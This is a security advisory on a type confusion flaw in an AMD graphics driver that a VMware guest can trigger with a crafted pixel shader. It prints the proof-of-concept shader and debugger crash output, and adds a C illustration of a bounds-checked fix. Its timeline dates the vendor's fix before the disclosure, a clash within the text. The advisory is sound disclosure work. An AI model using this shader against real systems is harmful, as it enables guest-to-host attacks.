Talos Vulnerability Report

TALOS-2019-0964

AMD ATI Radeon ATIDXX64.DLL shader functionality VTABLE remote code execution vulnerability

January 21, 2020
CVE Number

CVE-2019-5183

Summary

An exploitable type confusion vulnerability exists in the AMD ATIDXX64.DLL driver, versions 26.20.13031.10003, 26.20.13031.15006 and 26.20.13031.18002. A specially crafted pixel shader can cause a type confusion issue, leading to potential code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from a VMware guest, affecting the VMware host.

Tested Versions

AMD ATIDXX64.DLL (26.20.13031.10003, 26.20.13031.15006, 26.20.13031.18002) running on a Radeon RX 550 / 550 Series card, with VMware Workstation 15 (15.5.0 build-14665864) and Windows 10 x64 as the guest VM

Product URLs

http://amd.com
http://vmware.com

CVSSv3 Score

9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-843: Access of Resource Using Incompatible Type (‘Type Confusion’)

Details

This vulnerability can be triggered by supplying a malformed pixel shader (inside the VMware guest operating system). Such an attack can be launched from VMware guest user mode. The vulnerability is triggered in the vmware-vmx.exe process on the host, or theoretically through WebGL (a remote website), leading to potential code execution (through a vtable type confusion).

Example of a fuzzer-generated shader:

ps_4_0
dcl_input_ps_siv constant v0.xyzw, position
dcl_output o0.xyzw
mov r262.xyz, v0.xyzw
mov r0.xyzw, r262.xyzw
mad r4.xy, r0.xyyy, r5.xyyy, l(-1.000000, -1.000000, -1.000000, -1.000000)
mul r3.xy, r4.xyyy, r2.xyyy
loop
  lt r15.x, r3.xxxx, l(0.950000, 0.950000, 0.950000, 0.950000)
  and r16.x, r14.xxxx, r15.xxxx
  not r17.x, r16.xxxx
  if_nz r17.x
    break
  endif
  if_nz r253.x
    add r4.xyz, r4.xyzz, r257.xxxx
    add r3.x, r3.xxxx, r256.xxxx
  endif
  add r3.x, r3.xxxx, l(0.005000, 0.005000, 0.005000, 0.005000)
endloop
mov r1.xyz, r4.xyzx
mov o0.xyzw, r1.xyzw

When supplying a specifically crafted shader, it is possible to "exceed" the vtable bounds and cause arbitrary code execution.
When a legitimate vtable address is supplied (1711F98 ??_7SCInst@@6B@ dq offset sub_3146A0), no such exception occurs, because the vtable bounds are not exceeded and the correct function/method is executed. However, after various further modifications of the shader, it is possible to execute different arbitrary vtable methods (the attacker can semi-control the control flow). This leads to potential code execution.

Debugger output:

This exception may be expected and handled.
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007fff`af02c1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007fff`b0434b40=6564616853343675
0:000> r
rax=00007fffb0434940 rbx=00000000ffffffff rcx=0000023d26c7ad70
rdx=0000080080000e02 rsi=0000023d26c7ad70 rdi=ffffffffffffffff
rip=00007fffaf02c1f2 rsp=000000e273af9590 rbp=0000023d26c7b0b0
 r8=0000023d26c45500  r9=0000000000000008 r10=0000000000000000
r11=0000000000000000 r12=0000000000000004 r13=0000023d26c7ae18
r14=0000023d26c45500 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007fff`af02c1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007fff`b0434b40=6564616853343675

0:000> db poi(@rax+0x200)
65646168`53343675  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
65646168`53343685  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    
0:000> db @rax+0x200
00007fff`b0434b40  75 36 34 53 68 61 64 65-72 49 64 00 00 00 00 00  u64ShaderId.....
00007fff`b0434b50  73 68 61 64 65 72 49 64-2e 75 36 34 48 69 00 00  shaderId.u64Hi..
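As an added illustration, not code from the advisory or from the AMD driver, the following C program models the failure mode the dump above shows: a dispatch through a vtable slot that lies past the end of the table reads adjacent string data (here the bytes of "u64ShaderId", which is why the faulting target is 0x6564616853343675), while a bounds-checked dispatch rejects that slot. The object layout, method names and two-entry table are hypothetical, and the raw-value check assumes an x86-64 little-endian build.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical object layout (not AMD's): a two-slot vtable immediately followed
 * by a string field, so that slot index 2 lands on the string's bytes. */
typedef int (*method_fn)(int);
static int m_inc(int x) { return x + 1; }
static int m_dbl(int x) { return x * 2; }

struct object_layout {
    method_fn vtable[2];
    char name[24];
};

/* Constructed sample: the string mirrors the field name seen at [rax+200h]. */
static const struct object_layout sample = { { m_inc, m_dbl }, "u64ShaderId" };

/* Unchecked dispatch, as in "call qword ptr [rax+slot*8]": returns the raw
 * 8 bytes found at that slot, whatever they are (x86-64, little-endian). */
static uint64_t unchecked_slot_target(size_t slot) {
    const unsigned char *base = (const unsigned char *)&sample;
    uint64_t raw;
    memcpy(&raw, base + slot * sizeof(method_fn), sizeof raw);
    return raw;
}

/* Triage heuristic: a "function pointer" made entirely of printable ASCII
 * bytes was almost certainly read from string data, not from a vtable. */
static int looks_like_ascii(uint64_t v) {
    for (int i = 0; i < 8; i++) {
        unsigned char b = (unsigned char)(v >> (8 * i));
        if (b < 0x20 || b > 0x7e) return 0;
    }
    return 1;
}

/* Hardened dispatch: reject out-of-range slots (returns -1) instead of
 * calling through whatever memory follows the table. */
static int checked_dispatch(size_t slot, int arg) {
    if (slot >= sizeof sample.vtable / sizeof sample.vtable[0]) return -1;
    return sample.vtable[slot](arg);
}

int main(void) {
    uint64_t bad = unchecked_slot_target(2);   /* 0x6564616853343675 = "u64Shade" */
    printf("raw=0x%016llx ascii=%d checked=%d\n", (unsigned long long)bad,
           looks_like_ascii(bad), checked_dispatch(2, 21));
    return 0;
}
```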

Crash Information

This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(249c.1f6c): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
ntdll!NtGetContextThread+0x14:
00007ffe`9525de54 c3              ret
0:016> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for amdihk64.dll

KEY_VALUES_STRING: 1

    Key  : AV.Fault
    Value: Read

    Key  : Analysis.CPU.Sec
    Value: 4

    Key  : Analysis.DebugAnalysisProvider.CPP
    Value: Create: 8007007e on CLAB

    Key  : Analysis.DebugData
    Value: CreateObject

    Key  : Analysis.DebugModel
    Value: CreateObject

    Key  : Analysis.Elapsed.Sec
    Value: 51

    Key  : Analysis.Memory.CommitPeak.Mb
    Value: 161

    Key  : Analysis.System
    Value: CreateObject

    Key  : Timeline.Process.Start.DeltaSec
    Value: 195


APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  (.ecxr)
rax=00007ffe8a7a0560 rbx=00000000ffffffff rcx=000001cbbeeffc10
rdx=0000080080000e02 rsi=000001cbbeeffc10 rdi=ffffffffffffffff
rip=00007ffe893bc1f2 rsp=000000c7736f57f0 rbp=000001cbbeefff50
 r8=000001cbb28a0880  r9=0000000000000008 r10=0000000000000000
r11=0000000000000000 r12=0000000000000004 r13=000001cbbeeffcb8
r14=000001cbb28a0880 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2:
00007ffe`893bc1f2 ff9000020000    call    qword ptr [rax+200h] ds:00007ffe`8a7a0760=6564616853343675
Resetting default scope

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 00007ffe893bc1f2 (atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000281ec2)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

PROCESS_NAME:  vmware-vmx.exe

READ_ADDRESS:  ffffffffffffffff 

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE_STR:  c0000005

EXCEPTION_PARAMETER1:  0000000000000000

EXCEPTION_PARAMETER2:  ffffffffffffffff

STACK_TEXT:
000000c7`736f57f0 00007ffe`893bd32e : 000001cb`beefff50 000001cb`00000000 000001cb`b28a0880 000001cb`beee1048 : atidxx64!AmdDxGsaFreeCompiledShader+0x281ec2
000000c7`736f58d0 00007ffe`89230beb : 000001cb`beef8c28 000001cb`b2872900 000001cb`beefb8d0 000001cb`beef8c00 : atidxx64!AmdDxGsaFreeCompiledShader+0x282ffe
000000c7`736f59b0 00007ffe`892323d9 : 000001cb`beef8c01 000000c7`00000000 000001cb`b2872900 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0xf68bb
000000c7`736f5a40 00007ffe`892477c6 : 000001cb`beee0de8 000001cb`bef00a30 000001cb`b28a08f0 000001cb`beee0de8 : atidxx64!AmdDxGsaFreeCompiledShader+0xf80a9
000000c7`736f5b80 00007ffe`89236880 : 000001cb`b28a0880 000001cb`beed8ec8 00000000`00000004 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0x10d496
000000c7`736f5d40 00007ffe`89215ad4 : 000001cb`b28a0880 000001cb`b2834a30 000000c7`736f6580 000001cb`b28a0880 : atidxx64!AmdDxGsaFreeCompiledShader+0xfc550
000000c7`736f5dc0 00007ffe`89159514 : 00000000`00000001 000000c7`736f6580 000001cb`b2834a30 000000c7`736f6580 : atidxx64!AmdDxGsaFreeCompiledShader+0xdb7a4
000000c7`736f6340 00007ffe`898e1cf8 : 000001cb`ad350448 000000c7`736f6470 000000c7`736f6580 000001cb`ae696660 : atidxx64!AmdDxGsaFreeCompiledShader+0x1f1e4
000000c7`736f6370 00007ffe`898c743b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x7a79c8
000000c7`736f64e0 00007ffe`898c6f72 : 00000000`00000000 000001cb`b2834730 000001cb`ae6b4890 000000c7`736fa1f0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78d10b
000000c7`736f6540 00007ffe`898f7983 : 000001cb`b2834730 00000000`00000000 000001cb`ae6f9e20 000000c7`736fa1f0 : atidxx64!AmdDxGsaFreeCompiledShader+0x78cc42
000000c7`736fa1a0 00007ffe`898c6e47 : 00000000`00000047 000001cb`b28cdc00 000001cb`ae6e7370 000001cb`ae6c2560 : atidxx64!AmdDxGsaFreeCompiledShader+0x7bd653
000000c7`736fa1d0 00007ffe`89996ac1 : 00000000`00000000 000000c7`736fa510 00000000`00000000 000001cb`bb9da450 : atidxx64!AmdDxGsaFreeCompiledShader+0x78cb17
000000c7`736fa230 00007ffe`89154e7a : 00000000`00000000 00000000`00000000 000000c7`736fa510 00000000`00000491 : atidxx64!AmdDxGsaFreeCompiledShader+0x85c791
000000c7`736fa270 00007ffe`89154cc3 : 000001cb`ae6dc850 00000000`00000003 00000000`00000003 00000000`00000000 : atidxx64!AmdDxGsaFreeCompiledShader+0x1ab4a
000000c7`736fa2b0 00007ffe`890dc05e : ffffffff`00000001 00000000`00000000 000001cb`bbe46ad8 00007ffe`00000003 : atidxx64!AmdDxGsaFreeCompiledShader+0x1a993
000000c7`736fa340 00007ffe`89848276 : 00000000`00000000 000000c7`736fa510 00000000`00000000 ffffffff`ffffffff : atidxx64!XdxQueryTlsLookupTable+0x6d6e
000000c7`736fa380 00007ffe`890ed8b1 : 000001cb`bb8354c8 000001cb`bbe6f77c 000001cb`ad347210 00000000`00000001 : atidxx64!AmdDxGsaFreeCompiledShader+0x70df46
000000c7`736fa4f0 00007ffe`8f418edc : 00000000`00000000 000000c7`736fa720 000001cb`bb8354b8 00007ffe`951fba17 : atidxx64!XdxQueryTlsLookupTable+0x185c1
000000c7`736fa620 00007ffe`8f42295f : 000000c7`00000001 000001cb`ad343628 000001cb`bb8354b8 000001cb`ad339710 : d3d11!CPixelShader::CLS::FinalConstruct+0x23c
000000c7`736fa880 00007ffe`8f42289a : 000000c7`736faf60 00007ffe`8f5d2388 000001cb`bb835350 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3
000000c7`736fa910 00007ffe`8f40ee58 : 000001cb`bb8353a8 000000c7`736faf60 000000c7`736faf90 00007ffe`8f5d2388 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x152
000000c7`736fa970 00007ffe`8f41b17d : 000001ca`00000000 000001cb`bb835350 00000000`00000000 000001ca`24e50000 : d3d11!CDevice::CreateLayeredChild+0xc88
000000c7`736fadb0 00007ffe`8f41b950 : 000001cb`bb835350 00000000`00000009 00000000`00000188 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
000000c7`736faf20 00007ffe`8f4014f4 : 000001cb`ad3378d0 00007ffe`00000009 000001cb`bbe6f6e0 000001cb`ad338108 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
000000c7`736fb110 00007ffe`8f401463 : 000001cb`bbe6f6e0 00000000`0000b000 000000c7`736fb470 00000000`00021c60 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x64
000000c7`736fb170 00007ffe`8f4011e8 : 000001cb`ad338108 000001cb`bbe6f6e0 00000000`0000039c 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x203
000000c7`736fb320 00007ff7`9ee1ef43 : 00000000`00000000 000000c7`736fb470 000001cb`ad6ad7f0 00000000`00000000 : d3d11!CDevice::CreatePixelShader+0x28
000000c7`736fb370 00007ff7`9ee20af6 : 00000000`00000000 000000c7`736ff5a0 000001cb`bbe46af0 000001cb`ad6ad7f0 : vmware_vmx+0x2bef43
000000c7`736fb4d0 00007ff7`9ee1fbc9 : 00007ff7`9eb60000 000001cb`ad6a8970 000001cb`ad6a8970 00000000`00000000 : vmware_vmx+0x2c0af6
000000c7`736ff4a0 00007ff7`9ee1cae1 : 000001cb`bbe1d810 00007ff7`9eb60000 00000000`00000003 00000000`00000003 : vmware_vmx+0x2bfbc9
000000c7`736ff9e0 00007ff7`9ee4eb06 : 000001cb`bbe1d770 00000000`0000000c 000001cb`bbe3b2f8 00000000`0000000c : vmware_vmx+0x2bcae1
000000c7`736ffa20 00007ff7`9ed52b8d : 00000000`00000100 000000c7`736ffbb0 00000000`00000028 000001cb`bbe1d760 : vmware_vmx+0x2eeb06
000000c7`736ffa60 00007ff7`9ecd1742 : 00000000`00007301 00000000`00000100 00000000`00000080 00000000`000000fc : vmware_vmx+0x1f2b8d
000000c7`736ffab0 00007ff7`9eccf358 : 00000000`00000000 00000000`00000001 000000c7`736ffcdc 00000000`00000040 : vmware_vmx+0x171742
000000c7`736ffc70 00007ff7`9ec1b45a : 00000000`00000000 00000000`00000002 00000000`00000002 000001ca`00000000 : vmware_vmx+0x16f358
000000c7`736ffca0 00007ff7`9f164e09 : 000001ca`27f61a10 00007ff7`9ec1b170 ffffffff`ffffffff 00000000`00000000 : vmware_vmx+0xbb45a
000000c7`736ffd10 00007ffe`94427bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x604e09
000000c7`736ffdd0 00007ffe`9522ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000c7`736ffe00 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21


SYMBOL_NAME:  atidxx64!AmdDxGsaFreeCompiledShader+281ec2

MODULE_NAME: atidxx64

IMAGE_NAME:  atidxx64.dll

STACK_COMMAND:  ~16s ; .ecxr ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_atidxx64.dll!AmdDxGsaFreeCompiledShader

OS_VERSION:  10.0.18362.1

BUILDLAB_STR:  19h1_release

OSPLATFORM_TYPE:  x64

OSNAME:  Windows 10

FAILURE_ID_HASH:  {08b458dc-1323-2abb-9f1a-d0ac543a793c}

Followup:     MachineOwner
---------

0:016> .exr -1
ExceptionAddress: 00007ffe893bc1f2 (atidxx64!AmdDxGsaFreeCompiledShader+0x0000000000281ec2)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 0000000000000000
   Parameter[1]: ffffffffffffffff
Attempt to read from address ffffffffffffffff

Timeline

2019-10-23 - Vendor Disclosure
2019-01-13 - Vendor confirmed fix and no issues found on versions 15.5.1 with 20.1.1 AMD drivers
2020-01-21 - Public Release

Credit

Discovered by Piotr Bania of Cisco Talos.